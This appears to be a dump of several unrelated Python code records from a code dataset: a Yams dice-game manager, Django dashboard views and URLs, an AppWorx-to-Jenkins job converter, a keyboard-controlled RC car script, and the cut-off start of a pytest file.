False\r\n\r\n def choose(self, player_key, game_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n game = Game().get(game_key)\r\n #\r\n player = Player().get(player_key)\r\n player.game = game\r\n player.put()\r\n\r\n def choose_game(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n player = Player().get(player_key)\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'choose_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def delete_game(self, game_key):\r\n \"\"\"\r\n \"\"\"\r\n # get the game to delete\r\n game = Game().get(game_key)\r\n\r\n # find the players\r\n player_query = Player().all()\r\n player_query.filter('game =', game)\r\n player_query.order('name')\r\n for player in player_query:\r\n # score delete\r\n player.score.delete()\r\n\r\n # dice deletion\r\n dice_query = Dice().all()\r\n dice_query.filter('player =', player)\r\n for dice in dice_query:\r\n dice.delete()\r\n\r\n # delete the current player\r\n player.delete()\r\n\r\n # delete the expected game\r\n game.delete()\r\n\r\n\r\n def roll(self, player_key, dice1,\r\n dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n # value to return\r\n new_turn = True\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice1')\r\n query.filter('player =', player)\r\n d1 = query.get()\r\n if d1.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice2')\r\n query.filter('player =', player)\r\n d2 = query.get()\r\n if d2.turn > 
2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice3')\r\n query.filter('player =', player)\r\n d3 = query.get()\r\n if d3.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice4')\r\n query.filter('player =', player)\r\n d4 = query.get()\r\n if d4.turn > 2:\r\n return False\r\n\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice5')\r\n query.filter('player =', player)\r\n d5 = query.get()\r\n if d5.turn > 2:\r\n return False\r\n\r\n if not dice1 == '':\r\n turn = d1.turn + 1\r\n d1.turn = turn\r\n if turn > 2:\r\n d1.put()\r\n new_turn = False\r\n d1.value = random.randint(1, 6)\r\n d1.selected = False\r\n d1.put()\r\n\r\n if not dice2 == '':\r\n turn = d2.turn + 1\r\n d2.turn = turn\r\n if turn > 2:\r\n d2.put()\r\n new_turn = False\r\n d2.value = random.randint(1, 6)\r\n d2.selected = False\r\n d2.put()\r\n\r\n if not dice3 == '':\r\n turn = d3.turn + 1\r\n d3.turn = turn\r\n if turn > 2:\r\n d3.put()\r\n new_turn = False\r\n d3.value = random.randint(1, 6)\r\n d3.selected = False\r\n d3.put()\r\n\r\n if not dice4 == '':\r\n turn = d4.turn + 1\r\n d4.turn = turn\r\n if turn > 2:\r\n d4.put()\r\n new_turn = False\r\n d4.value = random.randint(1, 6)\r\n d4.selected = False\r\n d4.put()\r\n\r\n if not dice5 == '':\r\n turn = d5.turn + 1\r\n d5.turn = turn\r\n if turn > 2:\r\n d5.put()\r\n new_turn = False\r\n d5.value = random.randint(1, 6)\r\n d5.selected = False\r\n d5.put()\r\n\r\n return new_turn\r\n\r\n def get_number_item(self, name, value, dice1,\r\n dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n score = 0\r\n if dice1 == value:\r\n score += value\r\n\r\n if dice2 == value:\r\n score += value\r\n\r\n if dice3 == value:\r\n score += value\r\n\r\n if dice4 == value:\r\n score += value\r\n\r\n if dice5 == value:\r\n score += value\r\n\r\n return {\r\n 'name': name,\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n def one(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('one', 1,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'one',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def two(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('two', 2,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'two',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def three(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('three', 3,\r\n dice1, dice2, dice3, dice4, dice5)\r\n else:\r\n return {\r\n 'name': 'three',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def four(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('four', 4,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'four',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def five(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('five', 5,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'five',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def six(self, score, dice1, dice2,\r\n dice3, dice4, 
dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n return self.get_number_item('six', 6,\r\n dice1, dice2, dice3, dice4, dice5)\r\n\r\n else:\r\n return {\r\n 'name': 'six',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def same_of_kind(self, number_of_kind,\r\n dice1, dice2, dice3, dice4, dice5,\r\n different=None):\r\n \"\"\"\r\n \"\"\"\r\n found = dict()\r\n\r\n if not different == dice1:\r\n found[dice1] = 1\r\n\r\n if not different == dice2:\r\n if dice2 in found:\r\n nb = found[dice2]\r\n found[dice2] = nb + 1\r\n else:\r\n found[dice2] = 1\r\n\r\n if not different == dice3:\r\n if dice3 in found:\r\n nb = found[dice3]\r\n found[dice3] = nb + 1\r\n else:\r\n found[dice3] = 1\r\n\r\n if not different == dice4:\r\n if dice4 in found:\r\n nb = found[dice4]\r\n found[dice4] = nb + 1\r\n else:\r\n found[dice4] = 1\r\n\r\n if not different == dice5:\r\n if dice5 in found:\r\n nb = found[dice5]\r\n found[dice5] = nb + 1\r\n else:\r\n found[dice5] = 1\r\n\r\n for key in found.keys():\r\n if found[key] >= number_of_kind:\r\n return key\r\n\r\n return 0\r\n\r\n\r\n def three_of_kind(self, score, dice1, dice2, dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(3, dice1, dice2, dice3, dice4, dice5):\r\n score = 50\r\n\r\n return {\r\n 'name': '3_of_kind',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': '3_of_kind',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def four_of_kind(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(4, dice1, dice2, dice3, dice4, dice5):\r\n score = 75\r\n\r\n return {\r\n 'name': '4_of_kind',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': '4_of_kind',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def full(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n different = self.same_of_kind(2, dice1, dice2,\r\n dice3, dice4, dice5)\r\n if self.same_of_kind(3, dice1, dice2,\r\n dice3, dice4, dice5, different):\r\n score = 75\r\n\r\n return {\r\n 'name': 'full',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'full',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def check_suite(self, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n # sorting\r\n sorted_dices = [dice1]\r\n if not dice2 in sorted_dices:\r\n sorted_dices.append(dice2)\r\n if not dice3 in sorted_dices:\r\n sorted_dices.append(dice3)\r\n if not dice4 in sorted_dices:\r\n sorted_dices.append(dice4)\r\n if not dice5 in sorted_dices:\r\n sorted_dices.append(dice5)\r\n\r\n for i in range(len(sorted_dices)):\r\n for j in range(len(sorted_dices)):\r\n if sorted_dices[i] < sorted_dices[j]:\r\n temp = sorted_dices[i]\r\n sorted_dices[i] = sorted_dices[j]\r\n sorted_dices[j] = temp\r\n\r\n # avoid double\r\n sorted_dices_only = list()\r\n for d in sorted_dices:\r\n if not d in sorted_dices_only:\r\n sorted_dices_only.append(d)\r\n\r\n fail = 5\r\n if len(sorted_dices_only) == 5:\r\n dif = sorted_dices_only[4] - sorted_dices_only[0]\r\n if dif == 4:\r\n fail = 0\r\n\r\n dif1 = sorted_dices_only[4] - sorted_dices_only[1]\r\n dif2 = sorted_dices_only[3] - sorted_dices_only[0]\r\n if dif1 == 3 or dif2 == 3:\r\n fail = 
1\r\n\r\n if len(sorted_dices_only) == 4:\r\n dif = sorted_dices_only[3] - sorted_dices_only[0]\r\n if dif == 3:\r\n fail = 1\r\n\r\n return fail\r\n\r\n def small_suite(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n fail = self.check_suite(dice1, dice2, dice3, dice4, dice5)\r\n if fail < 2:\r\n score = 50\r\n\r\n return {\r\n 'name': 's_suite',\r\n 'value': score,\r\n 'new': fail < 2,\r\n 'cancel': fail > 1\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 's_suite',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def big_suite(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n fail = self.check_suite(dice1, dice2, dice3, dice4, dice5)\r\n if fail == 0:\r\n score = 75\r\n\r\n return {\r\n 'name': 'b_suite',\r\n 'value': score,\r\n 'new': fail == 0,\r\n 'cancel': fail > 0\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'b_suite',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def lucky(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = dice1\r\n score += dice2\r\n score += dice3\r\n score += dice4\r\n score += dice5\r\n return {\r\n 'name': 'lucky',\r\n 'value': score,\r\n 'new': True,\r\n 'cancel': False\r\n }\r\n\r\n else:\r\n return {\r\n 'name': 'lucky',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def yams(self, score, dice1, dice2,\r\n dice3, dice4, dice5):\r\n \"\"\"\r\n \"\"\"\r\n if score == -1:\r\n score = 0\r\n if self.same_of_kind(5, dice1, dice2, dice3, dice4, dice5):\r\n score = 100\r\n\r\n return {\r\n 'name': 'yams',\r\n 'value': score,\r\n 'new': score > 0,\r\n 'cancel': score == 0\r\n }\r\n else:\r\n return {\r\n 'name': 'yams',\r\n 'value': score,\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def total(self, name):\r\n return {\r\n 'name': name,\r\n 'value': '',\r\n 'new': False,\r\n 'cancel': False\r\n }\r\n\r\n def __get_dice_value(self, dice_str, player):\r\n \"\"\"\r\n \"\"\"\r\n query = Dice().all()\r\n query.filter('name =', dice_str)\r\n query.filter('player =', player)\r\n dice = query.get()\r\n\r\n if dice:\r\n return dice.value\r\n\r\n else:\r\n return 0\r\n\r\n def get_score(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n d1 = self.__get_dice_value('dice1', player)\r\n d2 = self.__get_dice_value('dice2', player)\r\n d3 = self.__get_dice_value('dice3', player)\r\n d4 = self.__get_dice_value('dice4', player)\r\n d5 = self.__get_dice_value('dice5', player)\r\n\r\n if player.score:\r\n return [\r\n self.one(player.score.one, d1, d2, d3, d4, d5),\r\n self.two(player.score.two, d1, d2, d3, d4, d5),\r\n self.three(player.score.three, d1, d2, d3, d4, d5),\r\n self.four(player.score.four, d1, d2, d3, d4, d5),\r\n self.five(player.score.five, d1, d2, d3, d4, d5),\r\n self.six(player.score.six, d1, d2, d3, d4, d5),\r\n self.total('total1'),\r\n self.three_of_kind(player.score.three_of_kind, d1, d2, d3, d4, d5),\r\n self.four_of_kind(player.score.four_of_kind, d1, d2, d3, d4, d5),\r\n self.full(player.score.full, d1, d2, d3, d4, d5),\r\n self.small_suite(player.score.small_suite, d1, d2, d3, d4, d5),\r\n self.big_suite(player.score.big_suite, d1, d2, d3, d4, d5),\r\n self.lucky(player.score.lucky, d1, d2, d3, d4, d5),\r\n self.yams(player.score.yams, d1, d2, d3, d4, d5),\r\n self.total('total2'),\r\n self.total('total_all'),\r\n ]\r\n else:\r\n return [0, 0, 0, 0, 0, 0, '', 0, 0, 
0, 0, 0, 0, 0, '', '',]\r\n\r\n\r\n def update_score(self, player_key, score_name, score_value):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n total_one = 0\r\n total_two = 0\r\n total_all = 0\r\n\r\n if score_name == 'one':\r\n player.score.one = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.one > -1:\r\n total_one += player.score.one\r\n\r\n\r\n if score_name == 'two':\r\n player.score.two = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.two > -1:\r\n total_one += player.score.two\r\n\r\n if score_name == 'three':\r\n player.score.three = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.three > -1:\r\n total_one += player.score.three\r\n\r\n if score_name == 'four':\r\n player.score.four = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.four > -1:\r\n total_one += player.score.four\r\n\r\n if score_name == 'five':\r\n player.score.five = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.five > -1:\r\n total_one += player.score.five\r\n\r\n if score_name == 'six':\r\n player.score.six = int(score_value)\r\n total_one += int(score_value)\r\n elif player.score.six > -1:\r\n total_one += player.score.six\r\n\r\n player.score.total_one = total_one\r\n\r\n if score_name == '3_of_kind':\r\n player.score.three_of_kind = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.three_of_kind > -1:\r\n total_two += player.score.three_of_kind\r\n\r\n if score_name == '4_of_kind':\r\n player.score.four_of_kind = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.four_of_kind > -1:\r\n total_two += player.score.four_of_kind\r\n\r\n if score_name == 'full':\r\n player.score.full = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.full > -1:\r\n total_two += player.score.full\r\n\r\n if score_name == 's_suite':\r\n player.score.small_suite = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.small_suite > -1:\r\n total_two += player.score.small_suite\r\n\r\n if score_name == 'b_suite':\r\n player.score.big_suite = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.big_suite > -1:\r\n total_two += player.score.big_suite\r\n\r\n if score_name == 'lucky':\r\n player.score.lucky = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.lucky > -1:\r\n total_two += player.score.lucky\r\n\r\n if score_name == 'yams':\r\n player.score.yams = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.yams > -1:\r\n total_two += player.score.yams\r\n\r\n player.score.total_two = total_two\r\n player.score.total_all = total_one + total_two\r\n\r\n player.score.put()\r\n player.put()\r\n\r\n def show(self, player_key, new_turn=True):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice1')\r\n query.filter('player =', player)\r\n dice1 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice2')\r\n query.filter('player =', player)\r\n dice2 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice3')\r\n query.filter('player =', player)\r\n dice3 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice4')\r\n query.filter('player =', player)\r\n dice4 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice5')\r\n query.filter('player =', player)\r\n dice5 = query.get()\r\n\r\n 
player_query = Player.all()\r\n player_query.filter('game =', player.game)\r\n player_query.order('name')\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['dice1'] = dice1\r\n self.template_values['dice2'] = dice2\r\n self.template_values['dice3'] = dice3\r\n self.template_values['dice4'] = dice4\r\n self.template_values['dice5'] = dice5\r\n self.template_values['new_turn'] = new_turn\r\n self.template_values['score'] = self.get_score(player_key)\r\n self.template_values['players'] = player_query\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'roll.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def show_game(self, player_key=None, game_key=None):\r\n \"\"\"\r\n \"\"\"\r\n # init\r\n player = None\r\n # all\r\n player_query = Player.all()\r\n\r\n # filter\r\n if not player_key or player_key == '':\r\n game = Game().get(game_key)\r\n player_query.filter('game =', game)\r\n\r\n if not game_key or game_key == '':\r\n player = Player().get(player_key)\r\n player_query.filter('game =', player.game)\r\n\r\n # order\r\n player_query.order('name')\r\n\r\n if not player:\r\n player = player_query.get()\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['score'] = self.get_score(player.key())\r\n self.template_values['players'] = player_query\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'show_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n","sub_path":"GrandMonde/tools/yams_manager.py","file_name":"yams_manager.py","file_ext":"py","file_size_in_byte":27518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159322407","text":"\nfrom django.utils.translation import gettext_lazy as _\n\nfrom horizon import tables\nfrom horizon import workflows\nfrom horizon import exceptions\n\nfrom gutsdashboard.guts_migrations import tables as migrations_tables\nfrom gutsdashboard.guts_migrations import workflow as migration_workflow\nfrom gutsdashboard.api import guts as guts_api\n\n\nclass LaunchMigrationView(workflows.WorkflowView):\n workflow_class = migration_workflow.LaunchMigration\n\n\nclass IndexView(tables.DataTableView):\n table_class = migrations_tables.MigrationsTable\n template_name = \"guts_migrations/index.html\"\n page_title = _(\"Resource Migrations\")\n\n def get_data(self):\n try:\n migrations = guts_api.migrations_list(self.request)\n except Exception:\n migrations = []\n exceptions.handle(self.request,\n _(\"Unable to retrieve migrations.\")\n )\n\n if migrations:\n for migration in migrations:\n if hasattr(migration, 'resource_id'):\n resource = guts_api.resource_get(\n self.request, migration.resource_id\n )\n setattr(migration, 'resource_name', \"%s (%s)\" % (resource.name, resource.type))\n\n if hasattr(migration, 'destination_hypervisor'):\n destination = guts_api.destination_get(\n self.request, migration.destination_hypervisor\n )\n setattr(migration,\n 'destination_hypervisor',\n destination.hypervisor_name\n )\n\n return migrations\n","sub_path":"gutsdashboard/guts_migrations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"144211738","text":"import argparse\nimport jenkins\nfrom exp_to_json import exp_to_json\nfrom lxml import etree as et\n\n\ndef set_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"exp_file\")\n parser.add_argument(\"jenkins_url\")\n parser.add_argument(\"jenkins_username\")\n parser.add_argument(\"jenkins_token\")\n return parser.parse_args()\n\n\ndef initial_project():\n global properties, builders, publishers, buildWrappers\n\n et.SubElement(project, 'description').text = exp_json['so_job_table']['params']['so_job_descr']\n et.SubElement(project, 'actions')\n et.SubElement(project, 'canRoam').text = 'true'\n et.SubElement(project, 'keepDependencies').text = 'false'\n et.SubElement(project, 'disabled').text = 'false'\n et.SubElement(project, 'blockBuildWhenUpstreamBuilding').text = 'false'\n et.SubElement(project, 'concurrentBuild').text = 'false'\n et.SubElement(project, 'scm', attrib={\"class\": \"jenkins.scm.NullSCM\"})\n et.SubElement(project, 'triggers', attrib={\"class\": \"vector\"})\n properties = et.SubElement(project, 'properties')\n\n rebuilds = et.SubElement(\n properties,\n 'com.sonyericsson.rebuild.RebuildSettings',\n plugin='rebuild@1.27'\n )\n et.SubElement(rebuilds, 'autoRebuild').text = 'false'\n et.SubElement(rebuilds, 'rebuildDisabled').text = 'false'\n\n builders = et.SubElement(project, 'builders')\n publishers = et.SubElement(project, 'publishers')\n buildWrappers = et.SubElement(project, 'buildWrappers')\n\n # paramterized job\n if exp_json['so_job_prompts']:\n pdp = et.SubElement(properties, 'hudson.model.ParametersDefinitionProperty')\n pd = et.SubElement(pdp, 'parameterDefinitions')\n for prompt in exp_json['so_job_prompts']:\n spd = et.SubElement(pd, 'hudson.model.StringParameterDefinition')\n et.SubElement(spd, 'name').text = prompt['params']['so_prompt_descr']\n et.SubElement(spd, 'description')\n et.SubElement(spd, 'defaultValue').text = prompt['params']['so_prompt_dflt']\n et.SubElement(spd, 'trim').text = 'false'\n\n\nif __name__ == '__main__':\n args = set_arguments()\n exp_json = exp_to_json(args.exp_file)\n\n # ******************************************************\n # create phases topology\n # ******************************************************\n original = [(job['params']['so_predecessors'], job['so_task_name']) for job in exp_json['so_chain_detail']]\n phases = [[] for _ in range(len(original))]\n while original:\n for job in original:\n so_predecessors, so_task_name = job\n if not so_predecessors:\n phases[0].append(so_task_name)\n original.remove(job)\n elif so_predecessors in phases:\n phases[phases.index(so_predecessors) + 1].append(so_task_name)\n original.remove(job)\n elif len(so_predecessors) > 1:\n for phase in phases:\n if so_predecessors[0] in phase:\n phases[phases.index(phase) + 1].append(so_task_name)\n original.remove(job)\n phases = filter(None, phases)\n\n # ******************************************************\n # AppWorx module (job) to Jenkins free-style job project\n # ******************************************************\n if not exp_json['so_chain_detail']:\n project = et.Element('project')\n initial_project()\n\n # build steps\n # *** only run sqr file for the demo ***\n so_program = exp_json['so_job_table']['params']['so_program']\n if so_program:\n shell = et.SubElement(builders, 'hudson.tasks.Shell')\n et.SubElement(shell, 'command').text = 'sqr {}.sqr'.format(so_program)\n\n # ********************************************************\n # AppWorx chain (process flow) to Jenkins 
multijob project\n # ********************************************************\n else:\n project = et.Element(\n 'com.tikal.jenkins.plugins.multijob.MultiJobProject',\n plugin='jenkins-multijob-plugin@1.29'\n )\n initial_project()\n\n # build steps\n chain_detail = sorted(exp_json['so_chain_detail'], key=lambda x: x['params']['so_chain_order'])\n for index, jobs in enumerate(phases):\n phase = et.SubElement(builders, 'com.tikal.jenkins.plugins.multijob.MultiJobBuilder')\n et.SubElement(phase, 'phaseName').text = 'Phase {}'.format(index + 1)\n et.SubElement(phase, 'continuationCondition').text = 'ALWAYS'\n et.SubElement(phase, 'executionType').text = 'PARALLEL'\n phase_jobs = et.SubElement(phase, 'phaseJobs')\n\n # jobs in each phase\n for job in jobs:\n phase_job = et.SubElement(phase_jobs, 'com.tikal.jenkins.plugins.multijob.PhaseJobsConfig')\n job_module = filter(lambda x: x['so_task_name'] == job, chain_detail)[0]['params']['so_module']\n et.SubElement(phase_job, 'jobName').text = job_module\n et.SubElement(phase_job, 'currParams').text = 'true'\n et.SubElement(phase_job, 'aggregatedTestResults').text = 'false'\n et.SubElement(phase_job, 'exposedSCM').text = 'false'\n et.SubElement(phase_job, 'disableJob').text = 'false'\n et.SubElement(phase_job, 'parsingRulesPath')\n et.SubElement(phase_job, 'maxRetries').text = '0'\n et.SubElement(phase_job, 'enableRetryStrategy').text = 'false'\n et.SubElement(phase_job, 'enableCondition').text = 'false'\n et.SubElement(phase_job, 'abortAllJob').text = 'true'\n et.SubElement(phase_job, 'config', attrib={\"class\": \"empty-list\"})\n et.SubElement(phase_job, 'killPhaseOnJobResultCondition').text = 'FAILURE'\n et.SubElement(phase_job, 'buildOnlyIfSCMChanges').text = 'false'\n et.SubElement(phase_job, 'applyConditionOnlyIfNoSCMChanges').text = 'false'\n\n if job in exp_json['so_object_cond']:\n\n # *** only create condition text for the demo ***\n condition_text = []\n conditions = exp_json['so_object_cond'][job]['conditions']\n for condition in conditions:\n so_condition_1 = condition['so_condition_1']\n so_qualifier = condition['so_qualifier']\n so_condition_2 = condition['so_condition_2']\n sub_condition = '({} {} {})'.format(so_condition_1, so_qualifier, so_condition_2)\n condition_text.append(sub_condition)\n\n et.SubElement(phase_job, 'enableCondition').text = 'true'\n et.SubElement(phase_job, 'condition').text = ' && '.join(condition_text)\n else:\n et.SubElement(phase_job, 'condition')\n\n # export Jenkins config file\n jenkins_job_config = et.tostring(\n project,\n xml_declaration=True,\n encoding='UTF-8',\n pretty_print=True\n )\n\n print(jenkins_job_config)\n\n # *********************************\n # import config directly to Jenkins\n # *********************************\n server = jenkins.Jenkins(\n args.jenkins_url,\n username=args.jenkins_username,\n password=args.jenkins_token\n )\n server.create_job(exp_json['so_job_table']['so_module'], jenkins_job_config)\n","sub_path":"appworx_jenkins_converter.py","file_name":"appworx_jenkins_converter.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64704129","text":"import RoboPiLib as RPL\nimport sys,tty,termios,signal,setup,time\n\nrace_mode = False\nfd = sys.stdin.fileno()\nold_settings = termios.tcgetattr(fd)\nglobal initial\ninitial = True\n\ndef interrupted(signum, frame):\n global initial\n initial = True\n move(0)\n turn(1420)\n\ndef stop():\n global initial\n initial = True\n move(0)\n 
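# announce the emergency halt on the console\n 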
print(\"Deus Halt\")\n\ndef move(speed):\n global initial\n if speed == 0 or speed == 1500:\n RPL.servoWrite(2,0)\n else:\n RPL.servoWrite(2,speed)\n\ndef turn(direction):\n #1000 = left\n #1420 = straight\n #2000 = right\n RPL.servoWrite(1,direction)\n\n\n\nsignal.signal(signal.SIGALRM, interrupted)\ntty.setraw(sys.stdin.fileno())\nprint(\"Press 1 to quit\")\nwhile True:\n DELAY = 0.5\n #key press delay is 0.5 seconds\n signal.setitimer(signal.ITIMER_REAL,DELAY)\n ch = sys.stdin.read(1)\n signal.setitimer(signal.ITIMER_REAL,0)\n if ch == '1':\n stop()\n termios.tcsetattr(fd,termios.TCSADRAIN, old_settings)\n break\n elif ch == ' ':\n stop()\n elif ch == 'w':\n move(2000)\n elif ch == 's':\n move(1000)\n elif ch == 'a':\n turn(1000)\n elif ch == 'd':\n turn(2000)\n elif ch == 'q':\n turn(1260)\n elif ch == 'e':\n turn(1560)\n\n\n elif ch == 'r':\n if race_mode:\n print(\"Cruise\")\n race_mode = False\n else:\n print(\"Race mode activated\")\n race_mode = True\n","sub_path":"r34.py","file_name":"r34.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"624303381","text":"from django.conf.urls import url\nfrom django.views.generic.base import RedirectView\n\nfrom .views import about, browse, article_history, diffview, diffview2, json_view, RequestLogListView, SearchView, SimilarArticleListView\n\nurlpatterns = [\n url(r'^diff/(?P<vid1>\\d+)/(?P<vid2>\\d+)/(?P<urlarg>.*)$', diffview, name='diffview'),\n url(r'^diff2/(?P<vid1>\\d+)/(?P<vid2>\\d+)/$', diffview2, name='diffview2'),\n url(r'^about/$', about, name='about'),\n url(r'^request-log/list/$', RequestLogListView.as_view(), name='requestlog_list'),\n url(r'^browse/$', browse, name='browse'),\n url(r'^browse/(?P<source>.*)$', browse, name='browse'),\n url(r'^similararticle/list/$', SimilarArticleListView.as_view(), name='similararticle_list'),\n url(r'^search/$', SearchView.as_view(), name='search'),\n url(r'^article-history/$', article_history, name='article_history'),\n url(r'^article-history/(?P<urlarg>.*)$', article_history, name='article_history'),\n url(r'^json/view/(?P<vid>\\d+)/?$', json_view),\n url(r'^$', RedirectView.as_view(url='/browse/', permanent=False), name='root'),\n]\n","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444001055","text":"import json\nimport sys\n\nimport numpy as np\nimport pytest\nfrom attrs import fields\nfrom ax import Experiment, Objective, OptimizationConfig\nfrom ax.storage.json_store.decoder import object_from_json\nfrom ax.storage.json_store.encoder import object_to_json\nfrom ax.storage.json_store.registry import (\n CORE_CLASS_DECODER_REGISTRY,\n CORE_CLASS_ENCODER_REGISTRY,\n CORE_DECODER_REGISTRY,\n CORE_ENCODER_REGISTRY,\n)\n\nimport boa.__main__ as dunder_main\nfrom boa import (\n ModularMetric,\n WrappedJobRunner,\n cd_and_cd_back,\n get_dictionary_from_callable,\n get_scheduler,\n instantiate_search_space_from_json,\n scheduler_from_json_file,\n scheduler_to_json_file,\n split_shell_command,\n)\nfrom boa.__version__ import __version__\nfrom boa.definitions import ROOT\n\nTEST_DIR = ROOT / \"tests\"\n\n\ndef test_save_load_config(\n generic_config,\n synth_config,\n metric_config,\n gen_strat1_config,\n soo_config,\n moo_config,\n pass_through_config,\n scripts_moo,\n scripts_synth_func,\n):\n for config in [\n generic_config,\n 